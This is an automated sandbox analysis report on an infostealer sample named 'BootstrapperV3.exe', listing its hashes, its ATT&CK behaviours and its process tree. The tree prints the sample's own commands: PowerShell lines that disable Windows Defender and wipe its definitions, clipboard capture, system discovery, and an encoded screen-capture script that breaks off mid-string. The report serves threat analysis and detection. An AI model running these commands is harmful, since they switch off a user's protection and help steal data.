c5e1d008c3ad103e2759906170b28464bf9cc2a21dbac3d022e31cc660f1fd90

Analysis

max time kernel
100s
max time network
101s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08/08/2024, 10:16

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV3.exe
Size

6.0MB
MD5

d4563afdf3d935b5e687b869202e5a2b
SHA1

55109c325015a6301186c5685e2bc872b4a36f7a
SHA256

c5e1d008c3ad103e2759906170b28464bf9cc2a21dbac3d022e31cc660f1fd90
SHA512

6937ee81dc84ffebf5008dd75082903d2ebdd7d79977ffa97b8e6e7799ebb20a040a839da4f9cb523316b613a3fa662d8c2dfa971b8d41f8ed2888a3afee5fed
SSDEEP

98304:p4Iu4+Dc0txamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HmMde3qv4P:pzp+DweNoInY7/sHfbRy9ZdAP

Score

9^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3004	powershell.exe
1932	powershell.exe
1088	powershell.exe
3032	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV3.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4876	cmd.exe
4656	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1508	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe
3580	BootstrapperV3.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234c9-21.dat	upx
behavioral2/memory/3580-25-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp	upx
behavioral2/files/0x00070000000234bc-27.dat	upx
behavioral2/files/0x00070000000234c7-29.dat	upx
behavioral2/files/0x00070000000234c3-46.dat	upx
behavioral2/memory/3580-48-0x00007FF9E3D90000-0x00007FF9E3D9F000-memory.dmp	upx
behavioral2/memory/3580-47-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp	upx
behavioral2/files/0x00070000000234c2-45.dat	upx
behavioral2/files/0x00070000000234c1-44.dat	upx
behavioral2/files/0x00070000000234c0-43.dat	upx
behavioral2/files/0x00070000000234bf-42.dat	upx
behavioral2/files/0x00070000000234be-41.dat	upx
behavioral2/files/0x00070000000234bd-40.dat	upx
behavioral2/files/0x00070000000234bb-39.dat	upx
behavioral2/files/0x00070000000234ce-38.dat	upx
behavioral2/files/0x00070000000234cd-37.dat	upx
behavioral2/files/0x00070000000234cc-36.dat	upx
behavioral2/files/0x00070000000234c8-33.dat	upx
behavioral2/files/0x00070000000234c6-32.dat	upx
behavioral2/memory/3580-54-0x00007FF9DFB70000-0x00007FF9DFB9D000-memory.dmp	upx
behavioral2/memory/3580-56-0x00007FF9E1F50000-0x00007FF9E1F69000-memory.dmp	upx
behavioral2/memory/3580-58-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp	upx
behavioral2/memory/3580-60-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp	upx
behavioral2/memory/3580-64-0x00007FF9E3CF0000-0x00007FF9E3CFD000-memory.dmp	upx
behavioral2/memory/3580-63-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp	upx
behavioral2/memory/3580-66-0x00007FF9DE680000-0x00007FF9DE6AE000-memory.dmp	upx
behavioral2/memory/3580-71-0x00007FF9DA870000-0x00007FF9DA928000-memory.dmp	upx
behavioral2/memory/3580-70-0x00007FF9CA8C0000-0x00007FF9CAC35000-memory.dmp	upx
behavioral2/memory/3580-69-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp	upx
behavioral2/memory/3580-73-0x00007FF9DE660000-0x00007FF9DE674000-memory.dmp	upx
behavioral2/memory/3580-76-0x00007FF9DEEA0000-0x00007FF9DEEAD000-memory.dmp	upx
behavioral2/memory/3580-75-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp	upx
behavioral2/memory/3580-78-0x00007FF9D9EF0000-0x00007FF9DA008000-memory.dmp	upx
behavioral2/memory/3580-117-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp	upx
behavioral2/memory/3580-180-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp	upx
behavioral2/memory/3580-196-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp	upx
behavioral2/memory/3580-243-0x00007FF9DE680000-0x00007FF9DE6AE000-memory.dmp	upx
behavioral2/memory/3580-248-0x00007FF9D9EF0000-0x00007FF9DA008000-memory.dmp	upx
behavioral2/memory/3580-247-0x00007FF9DEEA0000-0x00007FF9DEEAD000-memory.dmp	upx
behavioral2/memory/3580-246-0x00007FF9DE660000-0x00007FF9DE674000-memory.dmp	upx
behavioral2/memory/3580-245-0x00007FF9DA870000-0x00007FF9DA928000-memory.dmp	upx
behavioral2/memory/3580-244-0x00007FF9CA8C0000-0x00007FF9CAC35000-memory.dmp	upx
behavioral2/memory/3580-242-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp	upx
behavioral2/memory/3580-241-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp	upx
behavioral2/memory/3580-240-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp	upx
behavioral2/memory/3580-239-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp	upx
behavioral2/memory/3580-238-0x00007FF9E1F50000-0x00007FF9E1F69000-memory.dmp	upx
behavioral2/memory/3580-237-0x00007FF9DFB70000-0x00007FF9DFB9D000-memory.dmp	upx
behavioral2/memory/3580-236-0x00007FF9E3D90000-0x00007FF9E3D9F000-memory.dmp	upx
behavioral2/memory/3580-235-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp	upx
behavioral2/memory/3580-234-0x00007FF9E3CF0000-0x00007FF9E3CFD000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4716	tasklist.exe
2172	tasklist.exe
4728	tasklist.exe
3172	tasklist.exe
4016	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3032	WMIC.exe
4324	WMIC.exe
2200	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1440	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3004	powershell.exe
1088	powershell.exe
1088	powershell.exe
3004	powershell.exe
1932	powershell.exe
1932	powershell.exe
4656	powershell.exe
4656	powershell.exe
2212	powershell.exe
2212	powershell.exe
4656	powershell.exe
2212	powershell.exe
3032	powershell.exe
3032	powershell.exe
728	powershell.exe
728	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	tasklist.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeIncreaseQuotaPrivilege	1040	WMIC.exe
Token: SeSecurityPrivilege	1040	WMIC.exe
Token: SeTakeOwnershipPrivilege	1040	WMIC.exe
Token: SeLoadDriverPrivilege	1040	WMIC.exe
Token: SeSystemProfilePrivilege	1040	WMIC.exe
Token: SeSystemtimePrivilege	1040	WMIC.exe
Token: SeProfSingleProcessPrivilege	1040	WMIC.exe
Token: SeIncBasePriorityPrivilege	1040	WMIC.exe
Token: SeCreatePagefilePrivilege	1040	WMIC.exe
Token: SeBackupPrivilege	1040	WMIC.exe
Token: SeRestorePrivilege	1040	WMIC.exe
Token: SeShutdownPrivilege	1040	WMIC.exe
Token: SeDebugPrivilege	1040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1040	WMIC.exe
Token: SeRemoteShutdownPrivilege	1040	WMIC.exe
Token: SeUndockPrivilege	1040	WMIC.exe
Token: SeManageVolumePrivilege	1040	WMIC.exe
Token: 33	1040	WMIC.exe
Token: 34	1040	WMIC.exe
Token: 35	1040	WMIC.exe
Token: 36	1040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1040	WMIC.exe
Token: SeSecurityPrivilege	1040	WMIC.exe
Token: SeTakeOwnershipPrivilege	1040	WMIC.exe
Token: SeLoadDriverPrivilege	1040	WMIC.exe
Token: SeSystemProfilePrivilege	1040	WMIC.exe
Token: SeSystemtimePrivilege	1040	WMIC.exe
Token: SeProfSingleProcessPrivilege	1040	WMIC.exe
Token: SeIncBasePriorityPrivilege	1040	WMIC.exe
Token: SeCreatePagefilePrivilege	1040	WMIC.exe
Token: SeBackupPrivilege	1040	WMIC.exe
Token: SeRestorePrivilege	1040	WMIC.exe
Token: SeShutdownPrivilege	1040	WMIC.exe
Token: SeDebugPrivilege	1040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1040	WMIC.exe
Token: SeRemoteShutdownPrivilege	1040	WMIC.exe
Token: SeUndockPrivilege	1040	WMIC.exe
Token: SeManageVolumePrivilege	1040	WMIC.exe
Token: 33	1040	WMIC.exe
Token: 34	1040	WMIC.exe
Token: 35	1040	WMIC.exe
Token: 36	1040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3032	WMIC.exe
Token: SeSecurityPrivilege	3032	WMIC.exe
Token: SeTakeOwnershipPrivilege	3032	WMIC.exe
Token: SeLoadDriverPrivilege	3032	WMIC.exe
Token: SeSystemProfilePrivilege	3032	WMIC.exe
Token: SeSystemtimePrivilege	3032	WMIC.exe
Token: SeProfSingleProcessPrivilege	3032	WMIC.exe
Token: SeIncBasePriorityPrivilege	3032	WMIC.exe
Token: SeCreatePagefilePrivilege	3032	WMIC.exe
Token: SeBackupPrivilege	3032	WMIC.exe
Token: SeRestorePrivilege	3032	WMIC.exe
Token: SeShutdownPrivilege	3032	WMIC.exe
Token: SeDebugPrivilege	3032	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3032	WMIC.exe
Token: SeRemoteShutdownPrivilege	3032	WMIC.exe
Token: SeUndockPrivilege	3032	WMIC.exe
Token: SeManageVolumePrivilege	3032	WMIC.exe
Token: 33	3032	WMIC.exe
Token: 34	3032	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1004 wrote to memory of 3580	1004	BootstrapperV3.exe	83
PID 1004 wrote to memory of 3580	1004	BootstrapperV3.exe	83
PID 3580 wrote to memory of 1156	3580	BootstrapperV3.exe	86
PID 3580 wrote to memory of 1156	3580	BootstrapperV3.exe	86
PID 3580 wrote to memory of 2148	3580	BootstrapperV3.exe	87
PID 3580 wrote to memory of 2148	3580	BootstrapperV3.exe	87
PID 3580 wrote to memory of 4336	3580	BootstrapperV3.exe	88
PID 3580 wrote to memory of 4336	3580	BootstrapperV3.exe	88
PID 3580 wrote to memory of 2072	3580	BootstrapperV3.exe	92
PID 3580 wrote to memory of 2072	3580	BootstrapperV3.exe	92
PID 1156 wrote to memory of 3004	1156	cmd.exe	94
PID 1156 wrote to memory of 3004	1156	cmd.exe	94
PID 4336 wrote to memory of 4016	4336	cmd.exe	95
PID 4336 wrote to memory of 4016	4336	cmd.exe	95
PID 2148 wrote to memory of 1088	2148	cmd.exe	96
PID 2148 wrote to memory of 1088	2148	cmd.exe	96
PID 2072 wrote to memory of 1040	2072	cmd.exe	97
PID 2072 wrote to memory of 1040	2072	cmd.exe	97
PID 3580 wrote to memory of 3812	3580	BootstrapperV3.exe	99
PID 3580 wrote to memory of 3812	3580	BootstrapperV3.exe	99
PID 3812 wrote to memory of 3240	3812	cmd.exe	101
PID 3812 wrote to memory of 3240	3812	cmd.exe	101
PID 3580 wrote to memory of 116	3580	BootstrapperV3.exe	102
PID 3580 wrote to memory of 116	3580	BootstrapperV3.exe	102
PID 116 wrote to memory of 1000	116	cmd.exe	104
PID 116 wrote to memory of 1000	116	cmd.exe	104
PID 3580 wrote to memory of 1796	3580	BootstrapperV3.exe	105
PID 3580 wrote to memory of 1796	3580	BootstrapperV3.exe	105
PID 1796 wrote to memory of 3032	1796	cmd.exe	107
PID 1796 wrote to memory of 3032	1796	cmd.exe	107
PID 3580 wrote to memory of 3508	3580	BootstrapperV3.exe	108
PID 3580 wrote to memory of 3508	3580	BootstrapperV3.exe	108
PID 3508 wrote to memory of 4324	3508	cmd.exe	110
PID 3508 wrote to memory of 4324	3508	cmd.exe	110
PID 3580 wrote to memory of 4744	3580	BootstrapperV3.exe	111
PID 3580 wrote to memory of 4744	3580	BootstrapperV3.exe	111
PID 4744 wrote to memory of 1932	4744	cmd.exe	113
PID 4744 wrote to memory of 1932	4744	cmd.exe	113
PID 3580 wrote to memory of 4636	3580	BootstrapperV3.exe	114
PID 3580 wrote to memory of 4636	3580	BootstrapperV3.exe	114
PID 3580 wrote to memory of 1768	3580	BootstrapperV3.exe	115
PID 3580 wrote to memory of 1768	3580	BootstrapperV3.exe	115
PID 3580 wrote to memory of 4428	3580	BootstrapperV3.exe	118
PID 3580 wrote to memory of 4428	3580	BootstrapperV3.exe	118
PID 1768 wrote to memory of 4716	1768	cmd.exe	120
PID 1768 wrote to memory of 4716	1768	cmd.exe	120
PID 4428 wrote to memory of 4280	4428	cmd.exe	121
PID 4428 wrote to memory of 4280	4428	cmd.exe	121
PID 4636 wrote to memory of 2172	4636	cmd.exe	122
PID 4636 wrote to memory of 2172	4636	cmd.exe	122
PID 3580 wrote to memory of 4876	3580	BootstrapperV3.exe	123
PID 3580 wrote to memory of 4876	3580	BootstrapperV3.exe	123
PID 3580 wrote to memory of 4608	3580	BootstrapperV3.exe	125
PID 3580 wrote to memory of 4608	3580	BootstrapperV3.exe	125
PID 3580 wrote to memory of 3520	3580	BootstrapperV3.exe	126
PID 3580 wrote to memory of 3520	3580	BootstrapperV3.exe	126
PID 3580 wrote to memory of 1628	3580	BootstrapperV3.exe	129
PID 3580 wrote to memory of 1628	3580	BootstrapperV3.exe	129
PID 3580 wrote to memory of 2436	3580	BootstrapperV3.exe	131
PID 3580 wrote to memory of 2436	3580	BootstrapperV3.exe	131
PID 4608 wrote to memory of 4728	4608	cmd.exe	134
PID 4608 wrote to memory of 4728	4608	cmd.exe	134
PID 4876 wrote to memory of 4656	4876	cmd.exe	132
PID 4876 wrote to memory of 4656	4876	cmd.exe	132

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
440	attrib.exe
1836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1796
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3508
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1628
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2436
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGU